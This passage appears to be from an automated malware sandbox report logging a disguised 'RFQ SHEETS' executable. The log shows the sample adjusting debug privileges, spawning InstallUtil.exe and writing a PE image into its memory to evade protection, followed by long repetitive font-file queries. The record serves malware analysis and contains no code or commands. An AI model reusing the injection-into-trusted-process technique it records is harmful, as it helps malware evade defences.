                    Source: InstallUtil.exe, 00000005.00000002.2989899538.00000000010DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06699548 LdrInitializeThunk,LdrInitializeThunk,5_2_06699548
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A22008
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
